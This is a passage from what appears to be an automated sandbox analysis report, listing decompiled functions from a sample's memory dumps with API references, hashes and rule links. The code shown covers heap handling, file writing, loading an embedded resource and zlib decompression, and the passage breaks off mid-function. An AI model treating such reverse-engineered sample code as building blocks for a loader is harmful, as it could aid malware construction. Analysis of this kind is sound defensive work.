                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 192546213-0
                                                                                                                                                                      • Opcode ID: 2774ac9e5f7b38b0d256ed50f2b4cc7e54260e45ca4d121d23d8bc05adf22050
                                                                                                                                                                      • Instruction ID: acf91f0b192621483340f6d99b68dad878881d8e8b7377b9fd1201c82249adf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2774ac9e5f7b38b0d256ed50f2b4cc7e54260e45ca4d121d23d8bc05adf22050
                                                                                                                                                                      • Instruction Fuzzy Hash: E10140755086017AD5007BB1DD06D3F7669EFD0718F10C83FB444B90E2CA3C9C55AA5E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A9E0, Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040A9E0(void** _a4) {
				long _v4;
				void** _t18;

				_t18 = _a4;
				_v4 = 0;
				if(_t18[5] != 0) {
					return 0;
				} else {
					WriteFile( *_t18, _t18[1], _t18[2] - _t18[3],  &_v4, 0); // executed
					_t18[3] = _t18[2];
					return _v4;
				}
			}





                                                                                                                                                                      0x0040a9e2
                                                                                                                                                                      0x0040a9e6
                                                                                                                                                                      0x0040a9f2
                                                                                                                                                                      0x0040aa20
                                                                                                                                                                      0x0040a9f4
                                                                                                                                                                      0x0040aa07
                                                                                                                                                                      0x0040aa10
                                                                                                                                                                      0x0040aa19
                                                                                                                                                                      0x0040aa19

                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A9A8,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA07
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                                                                                                                      • Instruction ID: 14d3056ca1924aee99cb04667f0b380ac70d83ad29f9bf771d01894620e497e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                                                                                                                      • Instruction Fuzzy Hash: CBF09276105700AFD720DF58D948B87B7E8EB58721F10C82EE59AD2690C770E854DB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402BC1, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                      			E00402BC1() {
				void* _t3;
				void* _t4;
				short* _t6;

				_t4 = 9;
				do {
					_t6 = _t6 - 4;
					 *_t6 = 0;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				E0040DF60();
				_push(_t6); // executed
				L004050E2(); // executed
				if( *_t6 == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				return _t3;
			}






                                                                                                                                                                      0x00402bc2
                                                                                                                                                                      0x00402bc7
                                                                                                                                                                      0x00402bc7
                                                                                                                                                                      0x00402bca
                                                                                                                                                                      0x00402bd1
                                                                                                                                                                      0x00402bd1
                                                                                                                                                                      0x00402bd4
                                                                                                                                                                      0x00402bdc
                                                                                                                                                                      0x00402bdd
                                                                                                                                                                      0x00402bea
                                                                                                                                                                      0x00402bf3
                                                                                                                                                                      0x00402bec
                                                                                                                                                                      0x00402bec
                                                                                                                                                                      0x00402bec
                                                                                                                                                                      0x00402bf9

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoNativeSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1721193555-0
                                                                                                                                                                      • Opcode ID: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                                                                                                                      • Instruction ID: 8a645f6298b96527a3a9e5c011dcec852996ed75ec820e929ccd6a5cacf3a2a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FD0126081824986D750BE75850979BB3ECE704304F60887AE085565C1F7FCE9D99657
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409B40(long _a4) {
				long _t2;
				void* _t4;

				_t2 = _a4;
				if(_t2 <= 0) {
					return 0;
				} else {
					_t4 = RtlAllocateHeap( *0x417710, 8, _t2); // executed
					return _t4;
				}
			}





                                                                                                                                                                      0x00409b40
                                                                                                                                                                      0x00409b46
                                                                                                                                                                      0x00409b5c
                                                                                                                                                                      0x00409b48
                                                                                                                                                                      0x00409b51
                                                                                                                                                                      0x00409b57
                                                                                                                                                                      0x00409b57

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                                                                                                                      • Instruction ID: 0e995b311a0039e38a6c1dd281e12789fe5386c316f45d3f47623ba04496a456
                                                                                                                                                                      • Opcode Fuzzy Hash: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                                                                                                                      • Instruction Fuzzy Hash: 7FC04C713542007AD6519B24AE49F5776A9BB70B42F01C8357655E21A5DB30EC10D728
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409AE0, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409AE0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417710 = _t1;
				return _t1;
			}




                                                                                                                                                                      0x00409ae9
                                                                                                                                                                      0x00409aef
                                                                                                                                                                      0x00409af4

                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                      • Opcode ID: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                                                                                                                      • Instruction ID: 76b444b78102f1190b75b28dd56e974357e96cc3189ac6b4b6122ebffb005697
                                                                                                                                                                      • Opcode Fuzzy Hash: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                                                                                                                      • Instruction Fuzzy Hash: ACB0127038434056E2110B109C06B803520B304F83F104420F211581D4C7E02000C60C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409B20(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x417710, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                      0x00409b2c
                                                                                                                                                                      0x00409b32

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                      • Opcode ID: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
                                                                                                                                                                      • Instruction ID: fe9ec2d3ce91f197954555b3d321bf450e8b3086e077a3996b15cea7c2da6c74
                                                                                                                                                                      • Opcode Fuzzy Hash: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CB01275205100BFCA024B00FF04F457E32F750B00F01C830B214000F4C3315420EB0C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00411680, Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00411680(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}




                                                                                                                                                                      0x0041168a
                                                                                                                                                                      0x00411693

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                      • Opcode ID: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
                                                                                                                                                                      • Instruction ID: a7d40c5f4997ffdb313d2f9b6f16fb7c047b00c477a8a3c9f473b961936b746c
                                                                                                                                                                      • Opcode Fuzzy Hash: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
                                                                                                                                                                      • Instruction Fuzzy Hash: 9FB09275404202AFCA04CB54EA8980ABBA8AE90210F818824F04A8A021C234E1148A0B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 004026B8, Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                      			E004026B8(void* __eflags, struct HINSTANCE__* _a4, struct HRSRC__* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _t16;
				void** _t17;

				_push(0);
				_push(0);
				E0040DF60();
				_v8 = LoadResource(_a4, _a8);
				 *0x417018 = SizeofResource(_a4, _a8);
				_v8 = E00409B40( *0x417018);
				E00409C20(_v12, _v8,  *0x417018);
				FreeResource( *_t17);
				_t16 = _v20;
				return _t16;
			}








                                                                                                                                                                      0x004026ba
                                                                                                                                                                      0x004026bb
                                                                                                                                                                      0x004026bc
                                                                                                                                                                      0x004026ce
                                                                                                                                                                      0x004026de
                                                                                                                                                                      0x004026ee
                                                                                                                                                                      0x00402700
                                                                                                                                                                      0x00402708
                                                                                                                                                                      0x0040270d
                                                                                                                                                                      0x00402718

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                                                                                                                                                        • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51
                                                                                                                                                                        • Part of subcall function 00409C20: memcpy.MSVCRT ref: 00409C30
                                                                                                                                                                      • FreeResource.KERNEL32(?,02379F50,02379F50,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4216414443-0
                                                                                                                                                                      • Opcode ID: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
                                                                                                                                                                      • Instruction ID: aef506374d55060129c4874ad09f8e19456ab50fe59ad62301b1ec8aa9f30053
                                                                                                                                                                      • Opcode Fuzzy Hash: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF07471408301AFDB01AF61DD0186EBEB1FB98344F108C3EB584621B1D7369969AB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040E800, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 666COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                                      			E0040E800() {
				signed int _t719;
				signed int _t721;
				signed char* _t766;
				signed int* _t771;
				signed int _t784;
				void** _t794;
				signed int _t798;
				signed int _t805;
				void* _t812;

				_t771 =  *(_t812 + 4);
				if(_t771 == 0) {
					L369:
					return 0xfffffffe;
				} else {
					_t794 = _t771[7];
					 *(_t812 + 0x14) = _t794;
					if(_t794 == 0 || _t771[3] == 0 ||  *_t771 == 0 && _t771[1] != 0) {
						goto L369;
					} else {
						if( *_t794 == 0xb) {
							 *_t794 = 0xc;
						}
						_t784 = _t794[0xe];
						 *(_t812 + 0x18) = _t771[3];
						_t719 = _t771[4];
						 *(_t812 + 0x10) = _t719;
						 *(_t812 + 0x20) = _t719;
						_t805 = _t771[1];
						 *((intOrPtr*)(_t812 + 0x28)) = 0;
						_t721 =  *_t794;
						 *(_t812 + 0x10) =  *_t771;
						 *(_t812 + 0xc) = _t784;
						 *(_t812 + 0x38) = _t805;
						_t798 = _t794[0xf];
						if(_t721 > 0x1e) {
							L184:
							return 0xfffffffe;
						} else {
							 *(_t812 + 0x40) =  &(_t794[0x15]);
							_t766 =  *(_t812 + 0x14);
							do {
								switch( *((intOrPtr*)(_t721 * 4 +  &M0040FE40))) {
									case 0:
										_t723 = _t794[2];
										if(_t723 != 0) {
											__eflags = _t798 - 0x10;
											if(_t798 >= 0x10) {
												L17:
												__eflags = _t723 & 0x00000002;
												if((_t723 & 0x00000002) == 0) {
													L20:
													_t724 = _t794[8];
													_t794[4] = 0;
													__eflags = _t724;
													if(_t724 != 0) {
														 *(_t724 + 0x30) = 0xffffffff;
													}
													__eflags = _t794[2] & 0x00000001;
													if((_t794[2] & 0x00000001) == 0) {
														L32:
														_t771[6] = "incorrect header check";
														 *_t794 = 0x1d;
													} else {
														_t727 = (_t784 >> 8) + ((_t784 & 0x000000ff) << 8);
														__eflags = _t727 % 0x1f;
														_t784 =  *(_t812 + 0x10);
														if(_t727 % 0x1f != 0) {
															_t771 =  *(_t812 + 0x48);
															goto L32;
														} else {
															__eflags = (_t784 & 0x0000000f) - 8;
															if((_t784 & 0x0000000f) == 8) {
																_t731 = _t794[9];
																_t798 = _t798 - 4;
																_t784 = _t784 >> 4;
																 *(_t812 + 0x10) = _t784;
																_t777 = (_t784 & 0x0000000f) + 8;
																__eflags = _t731;
																if(_t731 != 0) {
																	__eflags = _t777 - _t731;
																	if(_t777 <= _t731) {
																		goto L28;
																	} else {
																		_t771 =  *(_t812 + 0x48);
																		_t771[6] = "invalid window size";
																		 *_t794 = 0x1d;
																	}
																} else {
																	_t794[9] = _t777;
																	L28:
																	_push(0);
																	_push(0);
																	_push(0);
																	_t794[5] = 1 << _t777;
																	_t734 = E00410AD0();
																	_t789 =  *(_t812 + 0x1c);
																	_t812 = _t812 + 0xc;
																	_t771 =  *(_t812 + 0x48);
																	_t794[6] = _t734;
																	_t771[0xc] = _t734;
																	 *_t794 =  !(_t789 >> 8) & 0x00000002 | 0x00000009;
																	_t784 = 0;
																	 *(_t812 + 0x10) = 0;
																	_t798 = 0;
																}
															} else {
																_t771 =  *(_t812 + 0x48);
																_t771[6] = "unknown compression method";
																 *_t794 = 0x1d;
															}
														}
													}
												} else {
													__eflags = _t784 - 0x8b1f;
													if(_t784 != 0x8b1f) {
														goto L20;
													} else {
														_push(0);
														_push(0);
														_push(0);
														_t794[6] = E004102D0();
														_push(2);
														_push(_t812 + 0x28);
														 *((short*)(_t812 + 0x30)) = 0x8b1f;
														_push(_t794[6]);
														_t737 = E004102D0();
														_t784 = 0;
														_t794[6] = _t737;
														_t812 = _t812 + 0x18;
														 *(_t812 + 0x10) = 0;
														_t798 = 0;
														 *_t794 = 1;
														goto L182;
													}
												}
												goto L183;
											} else {
												while(1) {
													__eflags = _t805;
													if(_t805 == 0) {
														goto L103;
													}
													_t761 = ( *_t766 & 0x000000ff) << _t798;
													_t766 =  &(_t766[1]);
													_t784 = _t784 + _t761;
													 *(_t812 + 0x14) = _t766;
													_t798 = _t798 + 8;
													 *(_t812 + 0x10) = _t784;
													_t805 = _t805 - 1;
													__eflags = _t798 - 0x10;
													if(_t798 < 0x10) {
														continue;
													} else {
														_t723 = _t794[2];
														_t771 =  *(_t812 + 0x48);
														goto L17;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											 *_t794 = 0xc;
											goto L183;
										}
										goto L370;
									case 1:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L37:
											 *(__edi + 0x10) = __edx;
											__eflags = __dl - 8;
											if(__dl == 8) {
												__eflags = __edx & 0x0000e000;
												if((__edx & 0x0000e000) == 0) {
													__ecx =  *(__edi + 0x20);
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edx >> 8;
														__eax = __edx >> 0x00000008 & 0x00000001;
														__eflags = __eax;
														 *__ecx = __eax;
													}
													__eflags =  *(__edi + 0x10) & 0x00000200;
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push( *(__edi + 0x18));
														__eax = E004102D0();
														__esp = __esp + 0xc;
														 *(__edi + 0x18) = __eax;
													}
													__edx = 0;
													 *__edi = 2;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L48;
												} else {
													 *(__ecx + 0x18) = "unknown header flags set";
													 *__edi = 0x1d;
													goto L183;
												}
											} else {
												 *(__ecx + 0x18) = "unknown compression method";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L37;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 2:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L50:
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 4) = __edx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												__eax = __edx;
												 *(__esp + 0x1c) = __dl;
												__eax = __edx >> 8;
												 *(__esp + 0x1d) = __al;
												__edx = __edx >> 0x10;
												 *(__esp + 0x1e) = __al;
												__eax = __esp + 0x1c;
												_push(4);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x27) = __dl;
												_push( *(__edi + 0x18));
												__eax = E004102D0();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 3;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											goto L57;
										} else {
											while(1) {
												L48:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
